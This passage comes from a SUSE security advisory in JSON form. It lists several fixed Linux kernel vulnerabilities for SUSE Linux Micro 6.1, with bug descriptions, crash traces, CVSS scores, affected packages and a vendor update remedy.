"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-39977",
"url": "https://www.suse.com/security/cve/CVE-2025-39977"
},
{
"category": "external",
"summary": "SUSE Bug 1252046 for CVE-2025-39977",
"url": "https://bugzilla.suse.com/1252046"
},
{
"category": "external",
"summary": "SUSE Bug 1252048 for CVE-2025-39977",
"url": "https://bugzilla.suse.com/1252048"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "important"
}
],
"title": "CVE-2025-39977"
},
{
"cve": "CVE-2025-40006",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40006"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmm/hugetlb: fix folio is still mapped when deleted\n\nMigration may be raced with fallocating hole. remove_inode_single_folio\nwill unmap the folio if the folio is still mapped. However, it\u0027s called\nwithout folio lock. If the folio is migrated and the mapped pte has been\nconverted to migration entry, folio_mapped() returns false, and won\u0027t\nunmap it. Due to extra refcount held by remove_inode_single_folio,\nmigration fails, restores migration entry to normal pte, and the folio is\nmapped again. As a result, we triggered BUG in filemap_unaccount_folio.\n\nThe log is as follows:\n BUG: Bad page cache in process hugetlb pfn:156c00\n page: refcount:515 mapcount:0 mapping:0000000099fef6e1 index:0x0 pfn:0x156c00\n head: order:9 mapcount:1 entire_mapcount:1 nr_pages_mapped:0 pincount:0\n aops:hugetlbfs_aops ino:dcc dentry name(?):\"my_hugepage_file\"\n flags: 0x17ffffc00000c1(locked|waiters|head|node=0|zone=2|lastcpupid=0x1fffff)\n page_type: f4(hugetlb)\n page dumped because: still mapped when deleted\n CPU: 1 UID: 0 PID: 395 Comm: hugetlb Not tainted 6.17.0-rc5-00044-g7aac71907bde-dirty #484 NONE\n Hardware name: QEMU Ubuntu 24.04 PC (i440FX + PIIX, 1996), BIOS 0.0.0 02/06/2015\n Call Trace:\n \u003cTASK\u003e\n dump_stack_lvl+0x4f/0x70\n filemap_unaccount_folio+0xc4/0x1c0\n __filemap_remove_folio+0x38/0x1c0\n filemap_remove_folio+0x41/0xd0\n remove_inode_hugepages+0x142/0x250\n hugetlbfs_fallocate+0x471/0x5a0\n vfs_fallocate+0x149/0x380\n\nHold folio lock before checking if the folio is mapped to avold race with\nmigration.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40006",
"url": "https://www.suse.com/security/cve/CVE-2025-40006"
},
{
"category": "external",
"summary": "SUSE Bug 1252342 for CVE-2025-40006",
"url": "https://bugzilla.suse.com/1252342"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-40006"
},
{
"cve": "CVE-2025-40024",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40024"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nvhost: Take a reference on the task in struct vhost_task.\n\nvhost_task_create() creates a task and keeps a reference to its\ntask_struct. That task may exit early via a signal and its task_struct\nwill be released.\nA pending vhost_task_wake() will then attempt to wake the task and\naccess a task_struct which is no longer there.\n\nAcquire a reference on the task_struct while creating the thread and\nrelease the reference while the struct vhost_task itself is removed.\nIf the task exits early due to a signal, then the vhost_task_wake() will\nstill access a valid task_struct. The wake is safe and will be skipped\nin this case.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40024",
"url": "https://www.suse.com/security/cve/CVE-2025-40024"
},
{
"category": "external",
"summary": "SUSE Bug 1252686 for CVE-2025-40024",
"url": "https://bugzilla.suse.com/1252686"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-40024"
},
{
"cve": "CVE-2025-40033",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40033"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nremoteproc: pru: Fix potential NULL pointer dereference in pru_rproc_set_ctable()\n\npru_rproc_set_ctable() accessed rproc-\u003epriv before the IS_ERR_OR_NULL\ncheck, which could lead to a null pointer dereference. Move the pru\nassignment, ensuring we never dereference a NULL rproc pointer.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40033",
"url": "https://www.suse.com/security/cve/CVE-2025-40033"
},
{
"category": "external",
"summary": "SUSE Bug 1252824 for CVE-2025-40033",
"url": "https://bugzilla.suse.com/1252824"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-40033"
},
{
"cve": "CVE-2025-40042",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40042"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ntracing: Fix race condition in kprobe initialization causing NULL pointer dereference\n\nThere is a critical race condition in kprobe initialization that can lead to\nNULL pointer dereference and kernel crash.\n\n[1135630.084782] Unable to handle kernel paging request at virtual address 0000710a04630000\n...\n[1135630.260314] pstate: 404003c9 (nZcv DAIF +PAN -UAO)\n[1135630.269239] pc : kprobe_perf_func+0x30/0x260\n[1135630.277643] lr : kprobe_dispatcher+0x44/0x60\n[1135630.286041] sp : ffffaeff4977fa40\n[1135630.293441] x29: ffffaeff4977fa40 x28: ffffaf015340e400\n[1135630.302837] x27: 0000000000000000 x26: 0000000000000000\n[1135630.312257] x25: ffffaf029ed108a8 x24: ffffaf015340e528\n[1135630.321705] x23: ffffaeff4977fc50 x22: ffffaeff4977fc50\n[1135630.331154] x21: 0000000000000000 x20: ffffaeff4977fc50\n[1135630.340586] x19: ffffaf015340e400 x18: 0000000000000000\n[1135630.349985] x17: 0000000000000000 x16: 0000000000000000\n[1135630.359285] x15: 0000000000000000 x14: 0000000000000000\n[1135630.368445] x13: 0000000000000000 x12: 0000000000000000\n[1135630.377473] x11: 0000000000000000 x10: 0000000000000000\n[1135630.386411] x9 : 0000000000000000 x8 : 0000000000000000\n[1135630.395252] x7 : 0000000000000000 x6 : 0000000000000000\n[1135630.403963] x5 : 0000000000000000 x4 : 0000000000000000\n[1135630.412545] x3 : 0000710a04630000 x2 : 0000000000000006\n[1135630.421021] x1 : ffffaeff4977fc50 x0 : 0000710a04630000\n[1135630.429410] Call trace:\n[1135630.434828] kprobe_perf_func+0x30/0x260\n[1135630.441661] kprobe_dispatcher+0x44/0x60\n[1135630.448396] aggr_pre_handler+0x70/0xc8\n[1135630.454959] kprobe_breakpoint_handler+0x140/0x1e0\n[1135630.462435] brk_handler+0xbc/0xd8\n[1135630.468437] do_debug_exception+0x84/0x138\n[1135630.475074] el1_dbg+0x18/0x8c\n[1135630.480582] security_file_permission+0x0/0xd0\n[1135630.487426] vfs_write+0x70/0x1c0\n[1135630.493059] ksys_write+0x5c/0xc8\n[1135630.498638] __arm64_sys_write+0x24/0x30\n[1135630.504821] el0_svc_common+0x78/0x130\n[1135630.510838] el0_svc_handler+0x38/0x78\n[1135630.516834] el0_svc+0x8/0x1b0\n\nkernel/trace/trace_kprobe.c: 1308\n0xffff3df8995039ec \u003ckprobe_perf_func+0x2c\u003e: ldr x21, [x24,#120]\ninclude/linux/compiler.h: 294\n0xffff3df8995039f0 \u003ckprobe_perf_func+0x30\u003e: ldr x1, [x21,x0]\n\nkernel/trace/trace_kprobe.c\n1308: head = this_cpu_ptr(call-\u003eperf_events);\n1309: if (hlist_empty(head))\n1310: \treturn 0;\n\ncrash\u003e struct trace_event_call -o\nstruct trace_event_call {\n ...\n [120] struct hlist_head *perf_events; //(call-\u003eperf_event)\n ...\n}\n\ncrash\u003e struct trace_event_call ffffaf015340e528\nstruct trace_event_call {\n ...\n perf_events = 0xffff0ad5fa89f088, //this value is correct, but x21 = 0\n ...\n}\n\nRace Condition Analysis:\n\nThe race occurs between kprobe activation and perf_events initialization:\n\n CPU0 CPU1\n ==== ====\n perf_kprobe_init\n perf_trace_event_init\n tp_event-\u003eperf_events = list;(1)\n tp_event-\u003eclass-\u003ereg (2)\u003c- KPROBE ACTIVE\n Debug exception triggers\n ...\n kprobe_dispatcher\n kprobe_perf_func (tk-\u003etp.flags \u0026 TP_FLAG_PROFILE)\n head = this_cpu_ptr(call-\u003eperf_events)(3)\n (perf_events is still NULL)\n\nProblem:\n1. CPU0 executes (1) assigning tp_event-\u003eperf_events = list\n2. CPU0 executes (2) enabling kprobe functionality via class-\u003ereg()\n3. CPU1 triggers and reaches kprobe_dispatcher\n4. CPU1 checks TP_FLAG_PROFILE - condition passes (step 2 completed)\n5. CPU1 calls kprobe_perf_func() and crashes at (3) because\n call-\u003eperf_events is still NULL\n\nCPU1 sees that kprobe functionality is enabled but does not see that\nperf_events has been assigned.\n\nAdd pairing read an\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40042",
"url": "https://www.suse.com/security/cve/CVE-2025-40042"
},
{
"category": "external",
"summary": "SUSE Bug 1252861 for CVE-2025-40042",
"url": "https://bugzilla.suse.com/1252861"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
